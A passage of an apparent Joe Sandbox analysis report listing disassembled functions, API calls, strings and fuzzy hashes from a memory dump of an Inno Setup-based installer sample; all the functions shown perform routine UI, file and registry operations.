                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                                  • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText$EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 182455014-2867612384
                                                                  • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                  • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                                  • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                  • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                                  Function 0042EF6C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                                    • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                  • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                                  • 73A1A480.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A480A570CreateFontIndirectObjectSelect
                                                                  • String ID: ...\
                                                                  • API String ID: 2998766281-983595016
                                                                  • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                  • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                                  • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                  • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                                  Function 00416408 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                  • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                  • RegisterClassA.USER32(?), ref: 004164C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Class$InfoRegisterUnregister
                                                                  • String ID: @
                                                                  • API String ID: 3749476976-2766056989
                                                                  • Opcode ID: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                  • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                                  • Opcode Fuzzy Hash: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                  • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                                  Function 0049771C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                                  • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$Attributes$Move
                                                                  • String ID: isRS-%.3u.tmp
                                                                  • API String ID: 3839737484-3657609586
                                                                  • Opcode ID: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                  • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                                  • Opcode Fuzzy Hash: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                  • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                                  Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                  • ExitProcess.KERNEL32 ref: 00404E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ExitMessageProcess
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1220098344-2970929446
                                                                  • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                  • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                  • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                  • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                  Function 00456A1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                  • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
                                                                  • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                  • String ID: LoadTypeLib$RegisterTypeLib
                                                                  • API String ID: 1312246647-2435364021
                                                                  • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                  • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                                  • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                  • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                                  Function 00456F74 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                                  • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                                  Strings
                                                                  • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                                  • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                  • API String ID: 3850602802-3720027226
                                                                  • Opcode ID: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                  • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                                  • Opcode Fuzzy Hash: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                  • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                                  Function 00478180 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • GetFocus.USER32 ref: 004781EB
                                                                  • GetKeyState.USER32(0000007A), ref: 004781FD
                                                                  • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FocusMessageStateTextWaitWindow
                                                                  • String ID: Wnd=$%x
                                                                  • API String ID: 1381870634-2927251529
                                                                  • Opcode ID: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                  • Instruction ID: 5f1c8258d991fabeb8ce52e8cfeede19b84d8dc0ceec509adeab196e5a3e054a
                                                                  • Opcode Fuzzy Hash: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                                  • Instruction Fuzzy Hash: C011C430644645AFC700FBA5D845A9E7BF8EB49304B5184BEF408E7651DB386D00CA69
                                                                  Function 0046E430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$LocalSystem
                                                                  • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                  • API String ID: 1748579591-1013271723
                                                                  • Opcode ID: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                  • Instruction ID: 72319f5cb05664b7e116556de8a44c1f4f08e856cbf185e3f572017f7e9d6813
                                                                  • Opcode Fuzzy Hash: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                                  • Instruction Fuzzy Hash: 3011F8A440C3919ED340DF6AC44432BBAE4AB99708F04896FF9C8D6381E779C948DB77
                                                                  Function 00453F4A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                                    • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesDeleteErrorLastMove
                                                                  • String ID: DeleteFile$MoveFile
                                                                  • API String ID: 3024442154-139070271
                                                                  • Opcode ID: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                                  • Instruction ID: d61ccdf94e8101ca60a50ffa5b16d74e098655775539a7d8992e0f9997158dc0
                                                                  • Opcode Fuzzy Hash: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                                  • Instruction Fuzzy Hash: E6F062716041045BD701EBA2D94266EA3ECEB8430EFA0403BB900BB6C3DA3C9E09452D
                                                                  Function 00459184 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                  • API String ID: 47109696-2631785700
                                                                  • Opcode ID: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                                  • Instruction ID: b3b7ca93e3ee9f71f5f4917cf459f66c0bdee831e94fc7924cf2246e82346dcf
                                                                  • Opcode Fuzzy Hash: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                                  • Instruction Fuzzy Hash: 11F0A431300151EBD710EB5AD895B5E7698DB95356F50453BF940CB253C67CCC058B59
                                                                  Function 00483180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                                  • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                                  Strings
                                                                  • CSDVersion, xrefs: 004831B8
                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                  • API String ID: 3677997916-1910633163
                                                                  • Opcode ID: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                                  • Instruction ID: 86ea9b687bc925f919ffd8904499e524e0617f710df10bb4bfec30536caacf1e
                                                                  • Opcode Fuzzy Hash: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                                  • Instruction Fuzzy Hash: 84F03175E40208A6DF10EAE18C49BAF73BCAB04F05F104567E910E7281EB7AAB048B59
                                                                  Function 0042D8E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                  • API String ID: 1646373207-4063490227
                                                                  • Opcode ID: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                                  • Instruction ID: 46d83308b3a0af851ef73fb55c1ff88b015d3a0f0a3b668622d7e336d39da5d8
                                                                  • Opcode Fuzzy Hash: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                                  • Instruction Fuzzy Hash: F2E0DFE0B00B4122D720257A1C82B5B10894B84768FA0043B3888E52D6EDBCDD841A2D
                                                                  Function 0042EB4C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                  • API String ID: 1646373207-260599015
                                                                  • Opcode ID: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                                  • Instruction ID: e22649ab5c5d02c0682c512352339c2c95c689ad11c13297e1ab925b23cbcb3c
                                                                  • Opcode Fuzzy Hash: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                                  • Instruction Fuzzy Hash: B8D0C793711732566910B5FB3CD1DEB098C895427A39400B7F615E5541D55DDC1119AC
                                                                  Function 0044F73C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: NotifyWinEvent$user32.dll
                                                                  • API String ID: 1646373207-597752486
                                                                  • Opcode ID: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                                  • Instruction ID: 704f9416b83fe6db864644e5aa21ade638d5456887e5d0d6230baff76c02d14e
                                                                  • Opcode Fuzzy Hash: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                                  • Instruction Fuzzy Hash: 7DE012F0E4174499FB00BBB97A4671E3AD0E7A471CB00017FF454A62A1DB7C44184F9D
